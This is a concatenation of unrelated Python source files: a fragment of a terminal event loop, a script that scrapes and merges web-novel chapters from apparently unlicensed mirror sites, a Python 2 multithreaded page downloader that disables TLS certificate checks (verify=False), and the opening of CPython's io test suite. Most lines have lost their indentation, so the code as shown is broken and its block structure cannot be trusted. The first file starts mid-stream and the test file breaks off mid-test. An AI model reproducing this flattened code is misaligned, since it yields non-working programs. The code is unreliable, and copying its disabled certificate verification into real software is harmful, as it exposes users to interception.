self.remove_reader(self._schedule_pipe[0])
self._callbacks = None
def _ready_for_reading(self, timeout=None):
"""
Return the file descriptors that are ready for reading.
"""
fds = self.selector.select(timeout)
return fds
def received_winch(self):
"""
Notify the event loop that SIGWINCH has been received
"""
        # Process the signal asynchronously, because this handler can write to
        # the output, and doing that inside the signal handler easily causes
        # reentrant calls, giving runtime errors.
        # Further, this has to be thread safe. When the CommandLineInterface
        # does not run in the main thread, this function still has to be called
        # from the main thread. (That is the only place where we can install
        # signal handlers.)
def process_winch():
if self._callbacks:
self._callbacks.terminal_size_changed()
self.call_from_executor(process_winch)
def run_in_executor(self, callback):
"""
Run a long running function in a background thread.
(This is recommended for code that could block the event loop.)
Similar to Twisted's ``deferToThread``.
"""
# Wait until the main thread is idle.
# We start the thread by using `call_from_executor`. The event loop
# favours processing input over `calls_from_executor`, so the thread
# will not start until there is no more input to process and the main
# thread becomes idle for an instant. This is good, because Python
# threading favours CPU over I/O -- an autocompletion thread in the
        # background would cause a significant slowdown of the main thread.
        # It is mostly noticeable when pasting large portions of text while
        # real-time autocompletion is running as you type.
def start_executor():
threading.Thread(target=callback).start()
self.call_from_executor(start_executor)
def call_from_executor(self, callback, _max_postpone_until=None):
"""
Call this function in the main event loop.
Similar to Twisted's ``callFromThread``.
        :param _max_postpone_until: `None` or `time.time` value. For internal
use. If the eventloop is saturated, consider this task to be low
priority and postpone maximum until this timestamp. (For instance,
repaint is done using low priority.)
"""
assert _max_postpone_until is None or isinstance(_max_postpone_until, float)
self._calls_from_executor.append((callback, _max_postpone_until))
if self._schedule_pipe:
try:
os.write(self._schedule_pipe[1], b'x')
except (AttributeError, IndexError, OSError):
# Handle race condition. We're in a different thread.
# - `_schedule_pipe` could have become None in the meantime.
# - We catch `OSError` (actually BrokenPipeError), because the
# main thread could have closed the pipe already.
pass
def stop(self):
"""
Stop the event loop.
"""
self._running = False
def close(self):
self.closed = True
# Close pipes.
schedule_pipe = self._schedule_pipe
self._schedule_pipe = None
if schedule_pipe:
os.close(schedule_pipe[0])
os.close(schedule_pipe[1])
if self._inputhook_context:
self._inputhook_context.close()
def add_reader(self, fd, callback):
" Add read file descriptor to the event loop. "
fd = fd_to_int(fd)
self._read_fds[fd] = callback
self.selector.register(fd)
def remove_reader(self, fd):
" Remove read file descriptor from the event loop. "
fd = fd_to_int(fd)
if fd in self._read_fds:
del self._read_fds[fd]
self.selector.unregister(fd)
class call_on_sigwinch(object):
"""
    Context manager which installs a SIGWINCH callback.
(This signal occurs when the terminal size changes.)
"""
def __init__(self, callback):
self.callback = callback
self.previous_callback = None
def __enter__(self):
self.previous_callback = signal.signal(signal.SIGWINCH, lambda *a: self.callback())
def __exit__(self, *a, **kw):
if self.previous_callback is None:
# Normally, `signal.signal` should never return `None`.
# For some reason it happens here:
# https://github.com/jonathanslenders/python-prompt-toolkit/pull/174
signal.signal(signal.SIGWINCH, 0)
else:
signal.signal(signal.SIGWINCH, self.previous_callback)
|
main.py
|
# coding:utf-8
from distutils import archive_util
import sys
import requests
from bs4 import BeautifulSoup
import multiprocessing
import re
import os
import time
from config import Config, Host, OutputDir
from utils import getWebHost, removeN, trim
# Download a chapter's content from its url, and return the url of the next page
def get_ChartTxt(baseUrl, url, title, num, totalNum, encoding):
    # print('Chapter url: ' + url, encoding)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
    res = requests.get(url, headers=headers) # add the request headers to the GET call
    # Check the encoding requests detected for this url; here it comes back as ISO-8859-1
    # print("Source page encoding: %s" % (requests.get(url).encoding))
    # Look up the target site's actual encoding (utf-8 here); a mismatched encoding produces
    # garbled text, so set the response encoding to match the target site
# res.encoding = 'utf-8'
# res.encoding = 'gbk'
res.encoding = encoding
    soup = BeautifulSoup(res.text, 'html.parser') # parse the returned result
    # Find the chapter title
# <div class="bookname">
# <h1>第1章 大康王朝</h1>
# ...
# </div>
chapterTile = soup.select(Config[baseUrl]['chapterTile'])[0].get_text()
# [<h1>第1章 大康王朝</h1>]
chapterTile = chapterTile.strip()
numLength = len(str(totalNum))
# # n = "123"
# # s = n.zfill(5)
# # assert s == '00123'
numStr = str(num)
numStr = numStr.zfill(numLength)
print('正在下载 (%s/%s) %s %s' % (numStr, totalNum, chapterTile, url))
    # Start timing
start = time.time()
    # # Skip author's notes (chapter titles that don't contain "章")
# if re.search(r'.*?章', chapterTile) is None:
# return
chapterTile = re.sub(r'\?', '_', chapterTile)
chapterTile = re.sub(r'\/', '_', chapterTile)
    # Get the chapter text
content = soup.select(Config[baseUrl]['chapterContent'])[0].text
    # Clean up the chapter content into the desired format using regular expressions
content = re.sub(r'\(.*?\)', '', content)
content = re.sub(r'\r\n', '\n', content)
content = re.sub(r'\n+', '\n', content)
content = re.sub(r'<.*?>+', '\n', content)
content = re.sub(r' +', ' ', content)
ads = Config[baseUrl]['ads']
if(len(ads) > 0):
for ad in ads:
content = re.sub(r'%s' % (ad), ' ', content)
    # Write this chapter to its own file
try:
with open(r'.\%s\%s\%s %s.txt' % (OutputDir, title, numStr, chapterTile), 'w', encoding='utf-8') as f:
# print(content)
f.write(chapterTile + '\n' + content)
f.close()
end = time.time()
print('下载 %s %s 完成,运行时间 %0.2f s.' % (num, chapterTile, (end - start)))
except Exception as e:
print(e)
print(chapterTile, '下载失败', url)
errorPath = '.\Error\%s' % (title)
        # Create the error folder
try:
os.makedirs(errorPath)
except Exception as e:
pass
        # Record the failed url in an error file
with open("%s\error_url.txt" % (errorPath), 'a', encoding='utf-8') as f:
f.write(chapterTile+"下载失败 "+url+'\n')
f.close()
return
# Merge all chapters into a single file
def mergeFiles(title, encoding):
dirPath = r".\%s\%s" % (OutputDir, title) # 所有txt位于的文件夹路径
files = os.listdir(dirPath)
res = ""
encoding = 'utf-8'
i = 0
for file in files:
if file.endswith(".txt"):
i += 1
fileName = dirPath + "/" + file
print(fileName)
with open(fileName, "r", encoding=encoding) as file:
content = file.read()
file.close()
append = "\n\n%s" % (content)
res += append
bookPath = r"%s\\%s.txt" % (dirPath, title) # 文件路径
if os.path.exists(bookPath): # 如果文件存在
# 删除文件,可使用以下两种方法。
os.remove(bookPath)
# os.unlink(path)
with open(bookPath, "w", encoding=encoding) as outFile:
outFile.write(res)
outFile.close()
print('整书《%s》合并完成,总字数:%d' % (title, len(res)))
return
# Download one book: fetch all chapter links from its index page, then download every chapter
def thread_getOneBook(url, encoding):
# url = 'http://www.cnplugins.com/'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
    res = requests.get(url, headers=headers) # add the request headers to the GET call
if(encoding.isspace()):
res.encoding = requests.get(url).encoding
else:
res.encoding = encoding
html = res.text
    soup = BeautifulSoup(html, 'html.parser') # parse the returned result
    # First check the page's declared encoding
# <meta http-equiv="Content-Type" content="text/html; charset=gbk">
# <meta charset="utf-8">
rmetaCharset = [
r'meta http-equiv="Content-Type" content="text/html; charset=(.*)"',
r'meta charset="(.*)"'
]
encoding1 = 'gbk'
for r in rmetaCharset:
regular = re.compile(r)
encodingContent = re.findall(regular, html)
if(encodingContent != None and len(encodingContent) > 0):
encoding1 = encodingContent[0]
break
if(encoding1 != encoding):
thread_getOneBook(url, encoding1)
return
print('小说首页地址: ' + url)
print("原址编码:%s" % (encoding))
# baseUrl = ''
# try:
    # # extract the part of each chapter url that never changes (the book's base url)
# regular = re.compile(Host)
# baseUrl = re.findall(regular, url)[0]
# except Exception as e:
# baseUrl = getWebHost(url)
baseUrl = getWebHost(url)
# print(baseUrl)
# return
if(baseUrl.strip() == ''):
print('未正确匹配出根域名地址')
return
bookNameCss = Config[baseUrl]['bookName'].strip()
if(bookNameCss == ''):
        # Find the book title
# <meta property="og:novel:book_name" content="天命王侯">
# meta property="og:novel:book_name" content="(.*?)"
title = soup.find(attrs={"property": "og:novel:book_name"})['content']
else:
title = soup.select(bookNameCss)[0].get_text()
title = title.strip()
print('正在下载 《%s》' % (title))
    # Start timing
start = time.time()
    # Create a folder named after the book
if OutputDir not in os.listdir('.'):
os.mkdir(r".\%s" % (OutputDir))
if title not in os.listdir(r'.\%s' % (OutputDir)):
os.mkdir(r".\%s\%s" % (OutputDir, title))
print(title, "文件夹创建成功")
    # Collect all chapters of this book
charts_url = []
url_chartTitle = dict()
print('顶级域名:%s' % (baseUrl))
index = 0
# print (soup.select('body > section > div.wrapbox > div:nth-child(1) > div > ul > li:nth-child(6)'))
    # nth-child raises an error when run in python (BeautifulSoup); it has to be changed to nth-of-type
# print (soup.select('body > section > div.wrapbox > div:nth-of-type(1) > div > ul > li:nth-of-type(6)'))
# textlist = soup.select('#list a')
textlist = soup.select(Config[baseUrl]['menuList'])
for t in textlist:
# print(type(t))
# <a href="/book/10258/53450024.html">
# 第475章 五百人足矣
# </a>
# print (t) #获取单条html信息
try:
chart_title = trim(removeN(t.get_text()))
chart_url = t['href']
if(chart_url.strip() == ''):
print('章节url未找到')
continue
            # # Skip author's notes (titles that don't contain "章")
# if re.findall(r'.*?章', chart_title) is None:
# print('抓到作者感言,跳过...')
# continue
url_chartTitle[chart_url] = chart_title
if chart_url in charts_url:
                charts_url.remove(chart_url) # remove the earlier duplicate entry
charts_url.append(chart_url)
else:
index += 1
charts_url.append(chart_url)
# print('%d %s %s' % (index, chart_title, chart_url)) # 获取中间文字信息
except Exception as e:
print('[ERROR] ' + str(e))
continue
totalNum = len(charts_url)
print('总共找到 %d 章' % (totalNum))
    # Create the process pool that downloads this book
p = multiprocessing.Pool()
    # Prefix each downloaded file with an index number, so that books split into first/middle/last volumes (each with its own "Chapter 1") do not collide
num = 1
for i in charts_url:
        if(False == Config[baseUrl]['menuUrlIsFull']): # the menu urls are relative to the root domain
baseUrl1 = baseUrl
if (baseUrl.endswith('/') and i.startswith('/')):
baseUrl1 = baseUrl.rstrip('/')
url = baseUrl1+i
        else: # the menu urls are full paths
url = i
p.apply_async(get_ChartTxt, args=(
baseUrl, url, title, num, totalNum, encoding))
num += 1
        # For testing
# if(num >= 10):
# break
print('等待 %s 所有的章节被加载......' % (title))
p.close()
p.join()
end = time.time()
print('下载 %s 完成,运行时间 %0.2f s.' % (title, (end - start)))
print('开始生成 %s ................' % title)
# sort_allCharts(r'.',"%s.txt"%title)
mergeFiles(title, encoding)
return
# Create the processes that download several books
def process_getAllBook(urls):
    # Pass in the index-page urls of the books you want to download
print('主程序的PID:%s' % os.getpid())
print("-------------------开始下载-------------------")
p = []
for i in urls:
p.append(multiprocessing.Process(
target=thread_getOneBook, args=(i, 'utf-8')))
print("等待所有的主进程加载完成........")
for i in p:
i.start()
for i in p:
i.join()
print("-------------------全部下载完成-------------------")
return
urls = [
# 'http://www.26ksw.cc/book/10258/',
# 'http://www.biquge001.com/Book/17/17605/',
# 'http://www.biquge001.com/Book/17/17605/',
# 'http://www.biquge001.com/Book/8/8460/',
# 'https://www.xbiquge.la/7/7877/',
# 'http://www.ibiqu.net/book/7/',
# 'https://www.biquge.biz/22_22780/',
# 'https://www.biqugee.com/book/1366/',
# 'https://www.bige7.com/book/11742/'
# 'http://www.b5200.net/50_50537/',
# 'https://biquge96.com/30_30171/',
# 'http://www.b5200.net/52_52542/',
# 'https://www.bige7.com/book/2749/',
# 'http://www.soduso.cc/novel/57634/',
# 'http://www.soduso.cc/novel/57634/'
# 'http://www.biquge001.com/Book/2/2321/'
# 'https://www.xbiquge.la/0/745/'
# 'http://www.biquge001.com/Book/18/18632/'
'http://www.399xs.com/book/0/611/'
# 'https://www.yousheng8.com/yousheng/704/'
]
# 原址编码:gbk" src="https://www.baidu.com/js/opensug.js
if __name__ == "__main__":
argvNum = len(sys.argv)
    if(argvNum >= 2): # arg 1 is this file's name, arg 2 is the novel's index-page url
print('参数个数为:', argvNum, '个参数。')
print('参数列表:', str(sys.argv))
urls = [
sys.argv[1]
]
        # Download the specified books
        process_getAllBook(urls) # if the script hangs after the download finishes, run the commands below separately
# sort_allCharts(r'.\龙血战神',"龙血战神.txt")
# mergeFiles('明朝败家子', 'gbk')
# get_ChartTxt('https://biquge96.com/','https://biquge96.com/30_30171/17240253.html', '重生之金融巨头', 1, 1, 'utf-8')
|
LD.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : 'Victor'
# E-mail : linxianwusx@gmail.com
# Date : '2015/10/11'
# Version : 0.3
#
import Queue
import ConfigParser
import os
import requests
import threading
import cchardet
import re
import sqlite3 as sq
import time
import jsonpickle
NUM = 0
mutex = threading.Lock()
requests.packages.urllib3.disable_warnings()  # Suppress requests/urllib3 warning messages
def monkey_patch():
    # patch for the requests library
#http://www.sdc1992.com/2015/04/08/Python-Requests抓取网页时编码错误的解决方案/
prop = requests.models.Response.content
def content(self):
_content = prop.fget(self)
if self.encoding == 'ISO-8859-1' or not self.encoding :
encodings = requests.utils.get_encodings_from_content(_content)
if encodings:
self.encoding = encodings[0]
else:
# self.encoding = self.apparent_encoding
self.encoding = cchardet.detect(_content)['encoding']
        # _content = _content.decode(self.encoding, 'replace').encode('utf8', 'replace')  <- this line must NOT be added here
        # the returned content is raw bytes; decode the string using those bytes together with response.encoding
self._content = _content
return _content
requests.models.Response.content = property(content)
monkey_patch()
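# A small usage sketch of the patched behaviour (the URL below is illustrative):
# after monkey_patch(), Response.content still returns the raw bytes, but
# Response.encoding is corrected from the page's declared charset (or cchardet's
# guess) instead of the bogus ISO-8859-1 default, so callers can decode reliably:
#   r = requests.get('http://example.com/some-gbk-page.html')
#   text = r.content.decode(r.encoding, 'ignore')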
class Item(object):
html = ""
website = ""
name = ""
time = ""
def __init__(self, name, website):
self.website = website
self.name = name
self.time = self.getTime()
def setHtml(self, html):
self.html = html
@staticmethod
def getTime():
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
class Downloader(object):
def __init__(self, name, timeOut, urlList, downloadedNum, queue, mutLine, proxy):
self.queue = queue
self.name = name
self.timeOut = timeOut
self.downloadedNum = downloadedNum
self.urlList = urlList
self.threadList = []
self.mutLine = mutLine
self.proxy = proxy
def getItem(self):
""" use UrlList to distribute tasks and remove tasks url from UrlList """
global NUM
global mutex
mutex.acquire()
if self.urlList:
url = self.urlList.pop(0)
NUM += 1
mutex.release()
return [str(NUM + self.downloadedNum), url]
else:
mutex.release()
return None
def getHtml(self, url, timeOut):
try:
proxies = {}
if self.proxy is not None:
proxies = {
"http": self.proxy,
"https": self.proxy,
}
user_agent = {
'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER'}
response = requests.get(
url, timeout=timeOut, headers=user_agent, proxies=proxies, verify=False)
if response.status_code == requests.codes.ok:
return response.content.decode(response.encoding,'ignore').encode("utf-8")
else:
response.raise_for_status()
#raise Exception("HttpError", "Not response ok code !")
except Exception as e:
return e
def download(self):
while True:
retry = 0
temp = self.getItem()
if not temp:
                break  # no new items left, stop downloading
item = Item(temp[0], temp[1])
html = self.getHtml(item.website, self.timeOut)
            # if downloading the html failed, retry
while not isinstance(html, str):
                print item.name, "\tRetry: " + str(html)  # on failure, html holds the exception
retry += 1
html = self.getHtml(item.website, self.timeOut)
                # after 3 attempts in total, give up and mark the page as "None"
if retry >= 2 and (not isinstance(html, str)):
html = "None"
item.setHtml(html)
self.queue.put(jsonpickle.encode(item))
global mutex
mutex.acquire()
if html != "None":
print item.name, "\tDone"
else:
print item.name, "\tError"
mutex.release()
# print "Thread finished"
def run(self):
for i in xrange(self.mutLine):
self.threadList.append(threading.Thread(target=self.download))
for i in xrange(self.mutLine):
self.threadList[i].start()
def join(self):
for i in xrange(self.mutLine):
self.threadList[i].join()
class InsertDB(object):
def __init__(self, queue, name):
self.isWork = 1
self.name = name
self.queue = queue
self.cx = sq.connect(self.name + ".db", check_same_thread=False)
self.cx.text_factory = str
self.cu = self.cx.cursor()
def run(self):
self.insertDB = threading.Thread(target=self.insertDb)
self.insertDB.start()
def getItemList(self):
itemList = []
        num = 50  # by default, flush to the database in batches of 50 items
        while self.queue.qsize() < num:  # wait until the queue holds a full batch
if self.isWork == 1:
time.sleep(1)
            else:  # the downloader has finished; take whatever is left in the queue
num = self.queue.qsize()
for i in xrange(num):
item = self.queue.get()
itemList.append(self.item2List(item))
return itemList
@staticmethod
def item2List(itemJson):
item = jsonpickle.decode(itemJson)
list1 = [item.time, item.website, item.html]
return list1
def insertDb(self):
while True:
itemList = self.getItemList()
for i in itemList:
# i:item.time, item.website, item.html
                # decide whether this url is new or a previously failed download
self.cu.execute(
"SELECT count(id) FROM main WHERE website = ?", (i[1],))
item = self.cu.fetchone()
if item[0] == 0: # new one
try:
self.cu.execute(
"INSERT INTO main(time, website, html) VALUES(?,?,?)", i)
except Exception as e:
print i
                else:  # previously failed download; update the row with the new html
self.cu.execute(
"UPDATE main SET html = ? WHERE website = ?", (i[2], i[1]))
self.cx.commit()
if self.isWork == 0:
self.cu.close()
self.cx.close()
break
if len(itemList) == 0:
break
def join(self):
self.isWork = 0
self.insertDB.join()
class ListDownloader(object):
def __init__(self, configPath):
cf = ConfigParser.ConfigParser()
cf.read(configPath)
self.name = cf.get('LD', "Name")
self.proxy = cf.get('LD', "Proxy")
self.mutLine = cf.getint("LD", "MutLine")
self.timeOut = cf.getint("LD", "timeOut")
self.queue = Queue.Queue()
self.downloadedNum = 0
self.urlList = []
print "READ CONFIG OK".center(30, "*")
def createDB(self): # create database
cx = sq.connect(self.name + ".db")
cu = cx.cursor()
sql = "CREATE TABLE main(id INTEGER PRIMARY KEY AUTOINCREMENT, time TEXT,website BLOB, html BLOB);"
cu.execute(sql)
cu.close()
cx.close()
print "CREATE DATABASE OK".center(30, "*")
def getDownloadUrlList(self):
        # read the list of urls to download
originUrl = []
with open(self.name + "_url.txt") as f:
for line in f.readlines():
originUrl.append(line.strip("\n").decode("utf-8"))
        # read the urls already stored in the database
cx = sq.connect(self.name + ".db")
cu = cx.cursor()
sql = "SELECT website FROM main;"
cu.execute(sql)
downloadedUrl = []
for i in cu.fetchall():
downloadedUrl.append(i[0])
        # read the urls whose download failed (html == 'None')
sql = "SELECT website FROM main WHERE html='None';"
cu.execute(sql)
errorUrl = []
for i in cu.fetchall():
errorUrl.append(i[0])
cx.close()
        # set difference: urls not yet downloaded, plus the failed ones
url = [i for i in originUrl if i not in downloadedUrl]
url.extend(errorUrl)
print "LOAD DOWNLOAD LIST OK".center(30, "*")
print "ALL\tNEED\tERROR"
print str(len(originUrl)) + "\t" + str(len(url)) + "\t" + str(len(errorUrl))
return [len(downloadedUrl) - len(errorUrl), url]
def run(self):
        if not os.path.exists(self.name + ".db"):  # if the database file does not exist, create one
self.createDB()
else:
print "FIND DATABASE OK".center(30, "*")
self.downloadedNum, self.urlList = self.getDownloadUrlList()
print "START DOWNLOAD".center(30, "*")
downloader = Downloader(
name = self.name,
urlList = self.urlList,
downloadedNum = self.downloadedNum,
timeOut = self.timeOut,
queue = self.queue,
mutLine = self.mutLine,
proxy = self.proxy
)
downloader.run()
insertDB = InsertDB(self.queue, self.name)
insertDB.run()
downloader.join()
insertDB.join()
if __name__ == "__main__":
import sys
ListDownloader(sys.argv[1]).run()
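# Example configuration file (a sketch: the [LD] section and key names mirror the
# ConfigParser reads in ListDownloader.__init__; all values are illustrative):
#
#   [LD]
#   Name = mylist
#   Proxy = http://127.0.0.1:8080
#   MutLine = 10
#   timeOut = 30
#
# "Name" controls the output: pages are stored in mylist.db and the URL list is read
# from mylist_url.txt (one URL per line). MutLine is the number of download threads,
# timeOut the per-request timeout in seconds. Run it with:
#   python LD.py mylist.cfg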
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
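# A minimal sketch of that pattern (the class names below are illustrative and not
# part of this suite): the base test reads the implementation under test from an
# attribute, and the C/Python subclasses only set that attribute.
#
#   class ExampleBytesIOTest(unittest.TestCase):
#       def test_roundtrip(self):
#           buf = self.tp()
#           buf.write(b"data")
#           self.assertEqual(buf.getvalue(), b"data")
#
#   class CExampleBytesIOTest(ExampleBytesIOTest):
#       tp = io.BytesIO
#
#   class PyExampleBytesIOTest(ExampleBytesIOTest):
#       tp = pyio.BytesIO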
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import warnings
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def byteslike(*pos, **kw):
return memoryview(bytearray(*pos, **kw))
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data.tobytes(), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
bytes_fn = fn_with_NUL.encode('ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(TypeError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OS X this test consumes large resources; it takes
        # a long time to build the >2GB file and takes >2GB of disk space,
